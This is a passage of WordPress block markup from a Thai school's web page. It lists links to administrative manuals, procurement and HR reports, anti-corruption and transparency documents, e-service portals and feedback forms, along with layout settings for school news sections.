href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 